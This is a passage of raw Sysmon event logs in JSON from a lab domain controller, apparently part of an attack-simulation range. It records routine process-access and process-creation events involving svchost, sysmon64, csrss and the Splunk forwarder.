dll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.295\r\nProcessGuid: {A837DB8D-0239-5F25-0000-00102B1B0500}\r\nProcessId: 4128\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.295","ProcessGuid":"{A837DB8D-0239-5F25-0000-00102B1B0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 3276\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00102B1B0500}\r\nTargetProcessId: 4128\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"3276","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00102B1B0500}","TargetProcessId":"4128","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00102B1B0500}\r\nTargetProcessId: 4128\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00102B1B0500}","TargetProcessId":"4128","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 